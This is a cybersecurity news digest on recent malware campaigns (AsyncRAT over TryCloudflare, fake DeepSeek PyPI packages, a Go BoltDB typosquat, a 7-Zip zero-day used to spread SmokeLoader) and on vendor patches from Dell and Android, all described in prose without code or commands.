Cybercriminals are finding new ways to weaponize everyday tools, and this time, they’re using TryCloudflare to hide their tracks. Researchers uncovered a phishing campaign that stealthily delivers AsyncRAT via Python scripting and cloud tunnels. The attack starts with a Dropbox link leading to a maze of scripts that ultimately drop a harmful payload.

Even AI developers aren’t safe from deception. Threat actors have infiltrated PyPI with two malicious packages disguised as legitimate tools for DeepSeek. These fraudulent packages steal sensitive data, from user credentials to API keys, proving once again that trust in open-source repositories can be a double-edged sword.

One small vulnerability, one massive risk. Russian cybercriminals exploited a zero-day in 7-Zip to deliver SmokeLoader in attacks on Ukrainian entities. By bypassing Windows Mark-of-the-Web protections, the attackers tricked victims into executing malware-laden files.

Top Malware Reported in the Last 24 Hours

AsyncRAT abuses Python and TryCloudflare

Forcepoint’s X-Labs research team discovered a new malware campaign using AsyncRAT with Python scripting and TryCloudflare tunnels to stealthily deliver harmful payloads. The campaign starts with a phishing email that contains a Dropbox link, leading to a ZIP file. This file has a shortcut that redirects to a TryCloudflare link. The attack involves several steps: the shortcut leads to an LNK file, which triggers PowerShell scripts to get an obfuscated JavaScript file. This links to a ZIP file with a Python script that runs malicious code. 

Info-stealer impersonates DeepSeek AI tools

Threat actors are exploiting the popularity of DeepSeek to promote two malicious infostealer packages on PyPI, named deepseeek and deepseekai. These packages were designed to look like developer tools for an AI platform and were uploaded by a newly created account with no prior activity. These packages, when run, stole sensitive data from developers, including user information and environment variables like API keys. 

Go supply chain attack 

Socket researchers found a malicious typosquat package in the Go ecosystem, which imitated the popular BoltDB database module. The malicious package, named github[.]com/boltdb-go/bolt, allows remote code execution, enabling a hacker to control infected systems through a C2 server. The malware was cached by the Go Module Mirror, and the GitHub tag was changed to remove any evidence of the malware, hiding it from reviews. 

Top Vulnerabilities Reported in the Last 24 Hours`

Zero-day campaign targets Ukraine

The Zero Day Initiative Threat Hunting team identified a zero-day vulnerability (CVE-2025-0411) in 7-Zip, exploited by Russian cybercrime groups in a SmokeLoader malware campaign targeting Ukrainian entities in September 2024. The vulnerability allows bypassing Windows Mark-of-the-Web protections through double archiving, enabling execution of malicious content. Users are advised to update 7-Zip to version 24.09 or later, implement strict email security measures, and train employees on recognizing phishing attempts, including homoglyph attacks.

Dell releases critical security update

Dell has issued a Critical Security Update (DSA-2025-022) for its PowerProtect Data Domain systems to fix several vulnerabilities that could be exploited by attackers. There are seven critical vulnerabilities, including CVE-2024-33871 and CVE-2024-41110, which could allow attacks leading to unauthorized access, system compromises, and data loss. These critical CVEs involve risks from code execution in software like Artifex Ghostscript and Docker, issues with GNU Wget and the HTTP protocol, and flaws in the Kerberos library and libgit2, among others. 

February 2025 Android security updates

The February 2025 Android security updates fix 48 vulnerabilities, including a high-severity zero-day flaw (CVE-2024-53104) in the Android Kernel's USB Video Class driver. This bug allows attackers to elevate privileges due to improper frame parsing, leading to potential out-of-bounds write exploits. Another critical issue (CVE-2024-45569) in Qualcomm's WLAN can enable remote attackers to execute code, read or change memory, and cause crashes. Google released two patch sets for February, with immediate updates for Google Pixel devices.